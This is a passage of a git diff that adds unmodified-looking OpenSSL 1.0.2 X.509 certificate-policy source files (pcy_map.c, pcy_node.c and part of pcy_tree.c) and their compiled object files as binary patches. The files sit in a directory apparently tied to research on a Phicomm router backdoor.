ziBs_*vsx(@fH=04W>L<_qM5J2w`TL?v~=R0N1Hi!rGl)rnXcEQ?PUx4cxlU(Ym#!C
z+0lz<Q={g^Oy){@%p6Od9Zj2}cGE1^OD(H=k?zhg99?FtVqLa4xeL2K-n+J$yj8b~
zg{gwHTVKEzZP^kIhU6~kPSDs>zt=r^?&Emo%wxpie!)BDuMCpKocq%VaPH5^0O$U!
z1~~WU!vN=gdm7-}SFCwI+*hobb6*L)Hdk`29B9Y(^mVpuS+sOV&N@QBW;vG7bG4e#
z^OaHw4^l5z9I3;d+h236{7o89m+N}fu2iM%%n99HL0&hfY^x+`$N#5d5RP|T@CHf(
zL;2>Zzn|#qm;ErnnkW4b>?QmG0f~D`Yy*w48jbOOM>z@)auo+Y=?^BNxgb6P9M}BU
zc)YK0P2MM%u5kY23`lc+*2BQr_Pb7m!4Ti`!0?vGKJp94$NUg%K0n4eFfdgxewOmT
zV@J}#_^ZIf>er<DaXi)!V>zDd7nU1SU7`)G(LV5ZXlqD3vS9512?I9;lA?HTwE3*@
QP6>;DObyNdA=<_N0pu}Ee*gdg

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/pcy_map.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/pcy_map.c
new file mode 100644
index 0000000..b99eb91
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/pcy_map.c
@@ -0,0 +1,130 @@
+/* pcy_map.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2004.
+ */
+/* ====================================================================
+ * Copyright (c) 2004 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "cryptlib.h"
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+
+#include "pcy_int.h"
+
+/*
+ * Set policy mapping entries in cache. Note: this modifies the passed
+ * POLICY_MAPPINGS structure
+ */
+
+int policy_cache_set_mapping(X509 *x, POLICY_MAPPINGS *maps)
+{
+    POLICY_MAPPING *map;
+    X509_POLICY_DATA *data;
+    X509_POLICY_CACHE *cache = x->policy_cache;
+    int i;
+    int ret = 0;
+    if (sk_POLICY_MAPPING_num(maps) == 0) {
+        ret = -1;
+        goto bad_mapping;
+    }
+    for (i = 0; i < sk_POLICY_MAPPING_num(maps); i++) {
+        map = sk_POLICY_MAPPING_value(maps, i);
+        /* Reject if map to or from anyPolicy */
+        if ((OBJ_obj2nid(map->subjectDomainPolicy) == NID_any_policy)
+            || (OBJ_obj2nid(map->issuerDomainPolicy) == NID_any_policy)) {
+            ret = -1;
+            goto bad_mapping;
+        }
+
+        /* Attempt to find matching policy data */
+        data = policy_cache_find_data(cache, map->issuerDomainPolicy);
+        /* If we don't have anyPolicy can't map */
+        if (!data && !cache->anyPolicy)
+            continue;
+
+        /* Create a NODE from anyPolicy */
+        if (!data) {
+            data = policy_data_new(NULL, map->issuerDomainPolicy,
+                                   cache->anyPolicy->flags
+                                   & POLICY_DATA_FLAG_CRITICAL);
+            if (!data)
+                goto bad_mapping;
+            data->qualifier_set = cache->anyPolicy->qualifier_set;
+            /*
+             * map->issuerDomainPolicy = NULL;
+             */
+            data->flags |= POLICY_DATA_FLAG_MAPPED_ANY;
+            data->flags |= POLICY_DATA_FLAG_SHARED_QUALIFIERS;
+            if (!sk_X509_POLICY_DATA_push(cache->data, data)) {
+                policy_data_free(data);
+                goto bad_mapping;
+            }
+        } else
+            data->flags |= POLICY_DATA_FLAG_MAPPED;
+        if (!sk_ASN1_OBJECT_push(data->expected_policy_set,
+                                 map->subjectDomainPolicy))
+            goto bad_mapping;
+        map->subjectDomainPolicy = NULL;
+
+    }
+
+    ret = 1;
+ bad_mapping:
+    if (ret == -1)
+        x->ex_flags |= EXFLAG_INVALID_POLICY;
+    sk_POLICY_MAPPING_pop_free(maps, POLICY_MAPPING_free);
+    return ret;
+
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/pcy_map.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/pcy_map.o
new file mode 100644
index 0000000000000000000000000000000000000000..a3ccb6153d615a4a9aa166d2fc1292a25b85f64a
GIT binary patch
literal 2480
zcmbuA-EZ4e6u@ult_`enLSa&*Ar!=fI$&P1^3e@};xuWT$z3bj4k73)Cv}^$#<3Cy
zQpBiGRwT<X5D&cYh>#F}0PHc^2K1SyJx;t(DB?q)A)!s-oNM3q#<E}FNGJE4-#zEt
zPv2}6)tRAKj4+9j7s-LgC?VF!ft{mfjvOIl<j=$-|Hv=P7mC?C@>1EkCoh(rzm^u1
z?k_3T-RdaL-@6#S-Ai1#1+D7*Nd3Z@-xF7R9w<0>C{x@{Tybtt`-Pu}2uWP|93m9=
zc^-XC(WL71y(H%wWxLm2EW4x7+BG++xRcp__lG3kJ)G_BtwBiH-GU*0Roq;%J4;3s
zr|5-2g`<k|n^QPGM$=p{_MYv=V~X2~EAHhKrBMHC<-6%P%z()KZ+|+~@At3aX6+p=
zzdNfC=;-eB755nofRzrEQ@S@(uP)24$;<LZS-U|>)6-|u6HAr0X}8m7q)91rGW%Sc
zy4iP5XQa&2Cp?VB2pI-Vf*t}bonIobJw0RsD9S@#Lt<~eL}Hy}?AX|7{3Do~3jATe
zZwlu+BPKr_%8RM1LQzbAFkBQT-ak|jGw+Sa;#7CEAkGWpF>y*3GqO057t;`#7n6CB
zF50gX)?n#j@<%_cPYAtHICnPt!7PEUc95Yb5bhFk-2xfqyaQ9f6A2N4?&4s_VQ|N}
zdD6WCb{rJ<Jt$`ZgmF27pNrrZB6vN5Uyk705&V+~{$&IwR&`UW>y}g{R%2rwoT^@}
z8CuJ*5nJo#8qrGXTwYeSxtW=T;-a=F=hdP{T9-7lUB~7PeWPuVx%@e;QF;BexxO-3
zYIWUQ(N=U@XBchGG~UEqtKF&%@YSYakoh^aJpGC`E6>lD&zCgHFt}lPHX)C}dQkA2
zz_Yvy-zLf=LXaRYd6@Dsuvz>9$B%G)HG;p*agmGvl;a7GU*|a9A2#my9Dji0yBz1^
zkKzXh@&xEOD68|R&vCsEay$(-3cMRsse?aKYqM_a6=?0I*VdTTG&Xd}Haa$u=y6Gv
zR*Oj0M!jyBz|4kiNbnY&Y}tDClJBpXZOLjjETd^}5{XtYYH&z;-Pj-U{}^dV#w7+{
zf*ddu_T74(7t3sHkAdRe<Uo1ZK?sue_wRnN(PS@33Ohj_2SpxyxjKFx#_$rvPeCWv
z{IB_0$i<o&P+r*hPx26KHa=_d-C{N$`dJtZiN$veUt7FKynNy3r+ElA+dqaYU|?u4
zf5*?Su|U5K<}U*eJHK80V+3L6gy)C3ET8ePu`w^>Pw2Kk4}3%J3&}?oJUc)n>EEBP
Y(BZ@{w@>if4$Eg3dSgG*GlKd50ta|zrT_o{

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/pcy_node.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/pcy_node.c
new file mode 100644
index 0000000..d6c9176
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/pcy_node.c
@@ -0,0 +1,190 @@
+/* pcy_node.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2004.
+ */
+/* ====================================================================
+ * Copyright (c) 2004 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <openssl/asn1.h>
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+
+#include "pcy_int.h"
+
+static int node_cmp(const X509_POLICY_NODE *const *a,
+                    const X509_POLICY_NODE *const *b)
+{
+    return OBJ_cmp((*a)->data->valid_policy, (*b)->data->valid_policy);
+}
+
+STACK_OF(X509_POLICY_NODE) *policy_node_cmp_new(void)
+{
+    return sk_X509_POLICY_NODE_new(node_cmp);
+}
+
+X509_POLICY_NODE *tree_find_sk(STACK_OF(X509_POLICY_NODE) *nodes,
+                               const ASN1_OBJECT *id)
+{
+    X509_POLICY_DATA n;
+    X509_POLICY_NODE l;
+    int idx;
+
+    n.valid_policy = (ASN1_OBJECT *)id;
+    l.data = &n;
+
+    idx = sk_X509_POLICY_NODE_find(nodes, &l);
+    if (idx == -1)
+        return NULL;
+
+    return sk_X509_POLICY_NODE_value(nodes, idx);
+
+}
+
+X509_POLICY_NODE *level_find_node(const X509_POLICY_LEVEL *level,
+                                  const X509_POLICY_NODE *parent,
+                                  const ASN1_OBJECT *id)
+{
+    X509_POLICY_NODE *node;
+    int i;
+    for (i = 0; i < sk_X509_POLICY_NODE_num(level->nodes); i++) {
+        node = sk_X509_POLICY_NODE_value(level->nodes, i);
+        if (node->parent == parent) {
+            if (!OBJ_cmp(node->data->valid_policy, id))
+                return node;
+        }
+    }
+    return NULL;
+}
+
+X509_POLICY_NODE *level_add_node(X509_POLICY_LEVEL *level,
+                                 const X509_POLICY_DATA *data,
+                                 X509_POLICY_NODE *parent,
+                                 X509_POLICY_TREE *tree)
+{
+    X509_POLICY_NODE *node;
+    node = OPENSSL_malloc(sizeof(X509_POLICY_NODE));
+    if (!node)
+        return NULL;
+    node->data = data;
+    node->parent = parent;
+    node->nchild = 0;
+    if (level) {
+        if (OBJ_obj2nid(data->valid_policy) == NID_any_policy) {
+            if (level->anyPolicy)
+                goto node_error;
+            level->anyPolicy = node;
+        } else {
+
+            if (!level->nodes)
+                level->nodes = policy_node_cmp_new();
+            if (!level->nodes)
+                goto node_error;
+            if (!sk_X509_POLICY_NODE_push(level->nodes, node))
+                goto node_error;
+        }
+    }
+
+    if (tree) {
+        if (!tree->extra_data)
+            tree->extra_data = sk_X509_POLICY_DATA_new_null();
+        if (!tree->extra_data)
+            goto node_error;
+        if (!sk_X509_POLICY_DATA_push(tree->extra_data, data))
+            goto node_error;
+    }
+
+    if (parent)
+        parent->nchild++;
+
+    return node;
+
+ node_error:
+    policy_node_free(node);
+    return 0;
+
+}
+
+void policy_node_free(X509_POLICY_NODE *node)
+{
+    OPENSSL_free(node);
+}
+
+/*
+ * See if a policy node matches a policy OID. If mapping enabled look through
+ * expected policy set otherwise just valid policy.
+ */
+
+int policy_node_match(const X509_POLICY_LEVEL *lvl,
+                      const X509_POLICY_NODE *node, const ASN1_OBJECT *oid)
+{
+    int i;
+    ASN1_OBJECT *policy_oid;
+    const X509_POLICY_DATA *x = node->data;
+
+    if ((lvl->flags & X509_V_FLAG_INHIBIT_MAP)
+        || !(x->flags & POLICY_DATA_FLAG_MAP_MASK)) {
+        if (!OBJ_cmp(x->valid_policy, oid))
+            return 1;
+        return 0;
+    }
+
+    for (i = 0; i < sk_ASN1_OBJECT_num(x->expected_policy_set); i++) {
+        policy_oid = sk_ASN1_OBJECT_value(x->expected_policy_set, i);
+        if (!OBJ_cmp(policy_oid, oid))
+            return 1;
+    }
+    return 0;
+
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/pcy_node.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/pcy_node.o
new file mode 100644
index 0000000000000000000000000000000000000000..15ad0126f53b4ae3c4d0fb6eaf658e15a89c17c7
GIT binary patch
literal 3680
zcmbuC|7%-S6u@tjw99Ju8t2q((~%!C>CirseNiWDBx%#$NVKxHvboLIG<h?%`DXIo
z);U+fn#m)pj4?#PKVYEvlZ-NdFu37hAS!ONIFKQto83SeE27hQ&dt5;?P~&}2X5}U
zpL@=^=bd}seeLVfc%P%Cg$QXOJIUfmP(rS?FX|zthKNE|k=vac{-BjMS|PMjaMQ{P
zrcJnSpbeXx-Z5LN)fUH7H+QFK#kH{u45-!Xr@<<<41a)5_xii&wBh$4g`d~_?&}!E
z`aD>j`nzVd(~3Z}GUTTzx@8TEVze?lI(2^cIb1UQe9XEM9*$Xe!b8K<`fD(Fl~#_{
zgKeLk?8brhJ@biK=i}ScZo^eOHwQ)}Zq3umMBTJpHE+y0qro5d#;t4n!~4Sf!!Itx
zpQqE?FgaZ23%1PVvnGrOsrBclUQk4MTCR4!c?v+>3Q#NUz7X=jfY9<)BND4j)|cAx
zi-Qnz6`eZbA*L3$lAgJZFmMxdW&P2t9;odRH!atUP~7^7!E)8u`b_zj*-p#1jBT~3
zXD$$%Itl^mJ~1omiB*nz(5C~Qi~E>g$E}~?q1e#=WDC0#9*S9)h6iayo$p`kGTY{(
z#A!Z&g<D*`^HjC-Om*&YR$VWP2i4sGMqXZBu%*@ok*phPd^uR1Yn{OZwihaTu8=&e
z<?<<AO%l@I)AN+CYk1Vm8K!T$x<w6i2cIz6FgUq6pa!;Xs$(o4aY4gEwnFQFc9=l@
zs>qzsP}bBt((>vq(lX&`S>Lh3eFD}+pNII|!@NfpkaSehzn3#e4mL~~alD|op9FOu
z=OftnDW10-QN=s$j4Hn4uCUT|thHAOOtm>eN>{JqizwcR;)y73LeTeJ^a1$}f0%E4
zsc($=eq{H>950~{$jW+0x}aypg?=0v#5?ZjRlLWXVZ}G)a_m#QVZJs_Hxk?m7x}H$
zXwKR2CcqktDlheNvRzrqI$-FK;)t4~m6Pq>Qu{hzu^cjcC}IO~E>vW3@_we`=~ymK
z(zXn)1A;ZS3!aNc9QSfHJePPLVH0m+KgjL7p+{k73i=Uf!WYy9NrTpiztV)i0UYx=
z!6S_D{v`B`;=BhO?SJKV>^y>gx{3XnCj7G|{9+S+r3wE5IOcPae|*Flzs>nKoU?Nd
zj7V1p-XK~sTOew@CqT6R_&_8a*9Q9f2BSmTP&g8gYGfetG&3pWGh_VH!LgRp50TP1
z>x`nVYX`=1DXlb)3{~t8CNic@G_7PLlH*!34Ks<c49VyR^-SF!6JSxyEXRpdid}4^
zXV;$Rh6c23B9qA{Sr+-xmpA9eSmc6PO7qpVoSDf8>jRJpkuzNevI!%JM}%nj1A=$o
zz0mH$w-%*{5Cr*ZXoA0m5Cr*s&;<VwAqaAOcLe_gA&5QBw{^_;D$s@fUC!Y?Cio|V
z;OqGQVVnmg9+9|L;-eB*Bz{QZYbE}U#PMAg>wX|{+5W7=*Gu+yBrZQ!J3bJIy*_It
zF4x&FaXAj=fP!&kzKPK~?*v`s|D}|VoTrc5<1&0HMz-3xxSyzvck}Uxjf?x^eH$0|
z#H@{r_w}ZYi}#hNrNdbxF$%p=toLc574=L)HS`ICsHudJAnItTMATv)2WTEtgG5c{
zvspa{Cb_(!tMIAsX73>%zmzl8LNQ;^i^gGa#ejNRJ5Wqyb)L}w?0n#lTVVfUgn*&!
zl#35zzFlk%e{j!muS3vesq#<U@7&=Ym_*ghjqqJSc?24A`xkf8wl3PD*w=py7{>gs
z{y`pdGxV~E^)YW*#QLHS!6fPd*$8xt=l`gU3qR4vU|#65>Bs-_`S*YmmfCJU!+}o@
z3c9Gj!1%qz_3i$%9C&QW+5I!%+i3r1_y_JZUkK}nNcfBWZ?rbLT<07570;ss7&f~<
h#<cG}ATq-bbgM0Y+mL-z8u^d#{|Ap?FiGtG{{Rq;V$A>m

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/pcy_tree.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/pcy_tree.c
new file mode 100644
index 0000000..09b8691
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/pcy_tree.c
@@ -0,0 +1,831 @@
+/* pcy_tree.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2004.
+ */
+/* ====================================================================
+ * Copyright (c) 2004 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "cryptlib.h"
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+
+#include "pcy_int.h"
+
+/*
+ * Enable this to print out the complete policy tree at various point during
+ * evaluation.
+ */
+
+/*
+ * #define OPENSSL_POLICY_DEBUG
+ */
+
+#ifdef OPENSSL_POLICY_DEBUG
+
+static void expected_print(BIO *err, X509_POLICY_LEVEL *lev,
+                           X509_POLICY_NODE *node, int indent)
+{
+    if ((lev->flags & X509_V_FLAG_INHIBIT_MAP)
+        || !(node->data->flags & POLICY_DATA_FLAG_MAP_MASK))
+        BIO_puts(err, "  Not Mapped\n");
+    else {
+        int i;
+        STACK_OF(ASN1_OBJECT) *pset = node->data->expected_policy_set;
+        ASN1_OBJECT *oid;
+        BIO_puts(err, "  Expected: ");
+        for (i = 0; i < sk_ASN1_OBJECT_num(pset); i++) {
+            oid = sk_ASN1_OBJECT_value(pset, i);
+            if (i)
+                BIO_puts(err, ", ");
+            i2a_ASN1_OBJECT(err, oid);
+        }
+        BIO_puts(err, "\n");
+    }
+}
+
+static void tree_print(char *str, X509_POLICY_TREE *tree,
+                       X509_POLICY_LEVEL *curr)
+{
+    X509_POLICY_LEVEL *plev;
+    X509_POLICY_NODE *node;
+    int i;
+    BIO *err;
+    err = BIO_new_fp(stderr, BIO_NOCLOSE);
+    if (!curr)
+        curr = tree->levels + tree->nlevel;
+    else
+        curr++;
+    BIO_printf(err, "Level print after %s\n", str);
+    BIO_printf(err, "Printing Up to Level %ld\n", curr - tree->levels);
+    for (plev = tree->levels; plev != curr; plev++) {
+        BIO_printf(err, "Level %ld, flags = %x\n",
+                   plev - tree->levels, plev->flags);
+        for (i = 0; i < sk_X509_POLICY_NODE_num(plev->nodes); i++) {
+            node = sk_X509_POLICY_NODE_value(plev->nodes, i);
+            X509_POLICY_NODE_print(err, node, 2);
+            expected_print(err, plev, node, 2);
+            BIO_printf(err, "  Flags: %x\n", node->data->flags);
+        }
+        if (plev->anyPolicy)
+            X509_POLICY_NODE_print(err, plev->anyPolicy, 2);
+    }
+
+    BIO_free(err);
+
+}
+#else
+
+# define tree_print(a,b,c)      /* */
+
+#endif
+
+/*-
+ * Initialize policy tree. Return values:
+ *  0 Some internal error occurred.
+ * -1 Inconsistent or invalid extensions in certificates.
+ *  1 Tree initialized OK.
+ *  2 Policy tree is empty.
+ *  5 Tree OK and requireExplicitPolicy true.
+ *  6 Tree empty and requireExplicitPolicy true.
+ */
+
+static int tree_init(X509_POLICY_TREE **ptree, STACK_OF(X509) *certs,
+                     unsigned int flags)
+{
+    X509_POLICY_TREE *tree;
+    X509_POLICY_LEVEL *level;
+    const X509_POLICY_CACHE *cache;
+    X509_POLICY_DATA *data = NULL;
+    X509 *x;
+    int ret = 1;
+    int i, n;
+    int explicit_policy;
+    int any_skip;
+    int map_skip;
+    *ptree = NULL;
+    n = sk_X509_num(certs);
+
+#if 0
+    /* Disable policy mapping for now... */
+    flags |= X509_V_FLAG_INHIBIT_MAP;
+#endif
+
+    if (flags & X509_V_FLAG_EXPLICIT_POLICY)
+        explicit_policy = 0;
+    else
+        explicit_policy = n + 1;
+
+    if (flags & X509_V_FLAG_INHIBIT_ANY)
+        any_skip = 0;
+    else
+        any_skip = n + 1;
+
+    if (flags & X509_V_FLAG_INHIBIT_MAP)
+        map_skip = 0;
+    else
+        map_skip = n + 1;
+
+    /* Can't do anything with just a trust anchor */
+    if (n == 1)
+        return 1;
+    /*
+     * First setup policy cache in all certificates apart from the trust
+     * anchor. Note any bad cache results on the way. Also can calculate
+     * explicit_policy value at this point.
+     */
+    for (i = n - 2; i >= 0; i--) {
+        x = sk_X509_value(certs, i);
+        X509_check_purpose(x, -1, -1);
+        cache = policy_cache_set(x);
+        /* If cache NULL something bad happened: return immediately */
+        if (cache == NULL)
+            return 0;
+        /*
+         * If inconsistent extensions keep a note of it but continue
+         */
+        if (x->ex_flags & EXFLAG_INVALID_POLICY)
+            ret = -1;
+        /*
+         * Otherwise if we have no data (hence no CertificatePolicies) and
+         * haven't already set an inconsistent code note it.
+         */
+        else if ((ret == 1) && !cache->data)
+            ret = 2;
+        if (explicit_policy > 0) {
+            if (!(x->ex_flags & EXFLAG_SI))
+                explicit_policy--;
+            if ((cache->explicit_skip != -1)
+                && (cache->explicit_skip < explicit_policy))
+                explicit_policy = cache->explicit_skip;
+        }
+    }
+
+    if (ret != 1) {
+        if (ret == 2 && !explicit_policy)
+            return 6;
+        return ret;
+    }
+
+    /* If we get this far initialize the tree */
+
+    tree = OPENSSL_malloc(sizeof(X509_POLICY_TREE));
+
+    if (!tree)
+        return 0;
+
+    tree->flags = 0;
+    tree->levels = OPENSSL_malloc(sizeof(X509_POLICY_LEVEL) * n);
+    tree->nlevel = 0;
+    tree->extra_data = NULL;
+    tree->auth_policies = NULL;
+    tree->user_policies = NULL;
+
+    if (!tree->levels) {
+        OPENSSL_free(tree);
+        return 0;
+    }
+
+    memset(tree->levels, 0, n * sizeof(X509_POLICY_LEVEL));
+
+    tree->nlevel = n;
+
+    level = tree->levels;
+
+    /* Root data: initialize to anyPolicy */
+
+    data = policy_data_new(NULL, OBJ_nid2obj(NID_any_policy), 0);
+
+    if (!data || !level_add_node(level, data, NULL, tree))
+        goto bad_tree;
+
+    for (i = n - 2; i >= 0; i--) {
+        level++;
+        x = sk_X509_value(certs, i);
+        cache = policy_cache_set(x);
+        CRYPTO_add(&x->references, 1, CRYPTO_LOCK_X509);
+        level->cert = x;
+
+        if (!cache->anyPolicy)
+            level->flags |= X509_V_FLAG_INHIBIT_ANY;
+
+        /* Determine inhibit any and inhibit map flags */
+        if (any_skip == 0) {
+            /*
+             * Any matching allowed if certificate is self issued and not the
+             * last in the chain.
+             */
+            if (!(x->ex_flags & EXFLAG_SI) || (i == 0))
+                level->flags |= X509_V_FLAG_INHIBIT_ANY;
+        } else {
+            if (!(x->ex_flags & EXFLAG_SI))
+                any_skip--;
+            if ((cache->any_skip >= 0)
+                && (cache->any_skip < any_skip))
+                any_skip = cache->any_skip;
+        }
+
+        if (map_skip == 0)
+            level->flags |= X509_V_FLAG_INHIBIT_MAP;
+        else {
+            if (!(x->ex_flags & EXFLAG_SI))
+                map_skip--;
+            if ((cache->map_skip >= 0)
+                && (cache->map_skip < map_skip))
+                map_skip = cache->map_skip;
+        }
+
+    }
+
+    *ptree = tree;
+
+    if (explicit_policy)
+        return 1;
+    else
+        return 5;
+
+ bad_tree:
+
+    X509_policy_tree_free(tree);
+
+    return 0;
+
+}
+
+static int tree_link_matching_nodes(X509_POLICY_LEVEL *curr,
+                                    const X509_POLICY_DATA *data)
+{
+    X509_POLICY_LEVEL *last = curr - 1;
+    X509_POLICY_NODE *node;
+    int i, matched = 0;
